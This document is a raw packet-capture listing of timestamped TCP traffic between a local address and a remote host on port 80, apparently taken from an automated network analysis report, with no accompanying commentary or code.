Sep 27, 2024 00:29:11.702320099 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.702687979 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.702697992 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.702709913 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.702728987 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.702745914 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.702768087 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.702783108 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.702794075 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.702805042 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.702816010 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.702816010 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.702826977 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.702837944 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.702842951 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.702848911 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.702878952 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.702925920 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.702936888 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.702946901 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.702967882 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.703102112 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.703135967 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.703211069 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.703304052 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.703315020 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.703325987 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.703335047 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.703346014 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.703351974 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.703356028 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.703357935 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.703366041 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.703376055 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.703377008 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.703393936 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.703397036 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.703430891 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.703439951 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.703450918 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.703460932 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.703470945 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.703480005 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.703480959 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.703495026 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.703509092 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.703509092 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.703520060 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.703530073 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.703541994 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.703566074 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.703574896 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.703587055 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.703598022 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.703608036 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.703609943 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.703618050 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.703629017 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.703636885 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.703639984 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.703665018 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.703856945 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.703984022 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.703994036 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704005003 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704015970 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704020023 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.704025984 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704035997 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704039097 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.704046011 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704056978 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704056978 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.704072952 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704075098 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.704083920 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704093933 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704103947 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704108000 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.704117060 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704127073 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704129934 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.704137087 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704147100 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704157114 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.704158068 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704169989 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.704197884 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.704426050 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704540014 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704552889 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704565048 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704577923 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704588890 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704593897 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.704598904 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704607010 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.704608917 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704627037 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704627991 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.704641104 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704642057 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.704652071 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704662085 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704672098 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704678059 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.704683065 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704693079 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704701900 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704701900 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.704716921 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704716921 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.704726934 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704736948 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704746962 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.704771042 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.704790115 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704801083 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.704833984 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.705254078 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.705463886 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.705475092 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.705487013 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.705497980 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.705516100 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.786756039 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.796883106 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.796910048 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.796921015 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.796946049 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.796957016 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.796962023 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.796967030 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.796972990 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.796994925 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.797004938 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.797007084 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.797036886 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.797053099 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.797064066 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.797075033 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.797092915 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.797111034 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.797197104 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.797209024 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.797219038 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.797230005 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.797241926 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.797243118 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.797272921 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.797277927 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.797322035 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.797370911 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.797382116 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.797411919 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.797439098 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.797450066 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.797461033 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.797491074 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.797805071 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.797816038 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.797827005 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.797851086 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.797868967 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.797878027 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.797888041 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.797897100 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.797908068 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.797918081 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.797920942 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.797935963 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.798201084 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.798212051 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.798224926 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.798242092 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.798264980 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.798301935 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.798311949 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.798322916 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.798332930 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.798353910 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.798377037 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.798377991 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.798815966 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.798913002 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.798957109 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.798966885 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.798976898 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.798986912 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.798998117 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.799031973 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.799032927 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.799043894 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.799053907 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.799065113 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.799087048 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.799099922 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.799110889 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.799114943 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.799122095 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.799150944 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.799154043 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.799161911 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.799173117 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.799180984 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.799184084 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.799212933 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.800237894 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.800249100 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.800260067 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.800280094 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.800316095 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.800337076 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.800349951 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.800363064 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.800374031 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.800378084 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.800410032 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.800789118 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.800800085 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.800810099 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.800832987 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.800909996 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.800920010 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.800929070 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.800940990 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.800945044 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.800968885 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.800995111 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.801007986 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.801040888 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.801130056 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.801139116 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.801150084 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.801160097 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.801170111 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.801171064 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.801181078 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.801192999 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.801199913 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.801242113 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.801243067 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.801254034 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.801301003 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.801372051 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.801382065 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.801418066 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.804157972 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.804209948 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.804224014 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.804235935 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.804255962 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.804275036 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.804289103 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.804322958 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.804372072 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.804387093 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.804397106 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.804416895 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.804434061 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.804486036 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.804497004 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.804529905 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.804553032 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.804563999 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.804599047 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.804728985 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.804738998 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.804749012 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.804759026 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.804771900 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.804788113 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.804790020 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.804796934 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.804800987 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.804811954 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.804821968 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.804836035 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.804841995 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.804848909 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.804893970 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.804904938 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.804914951 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.804924965 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.804934978 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.804941893 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.804944992 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.804958105 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.804969072 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.804972887 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.804980040 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.804991007 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.805001020 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.805006981 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.805037975 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.887979984 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.888021946 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.888032913 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.888045073 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.888056040 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.888067007 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.888077974 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.888109922 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.888150930 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.888161898 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.888171911 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.888178110 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.888183117 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.888192892 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.888197899 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.888204098 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.888220072 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.888240099 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.888286114 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.888319016 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.888323069 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.888333082 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.888362885 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.888413906 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.888425112 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.888444901 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.888444901 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.888456106 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.888467073 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.888479948 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.888499022 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.888612032 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.888622999 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.888649940 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.888792038 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.888827085 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.888837099 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.888870001 CEST	57911	80	192.168.2.6	147.45.44.104
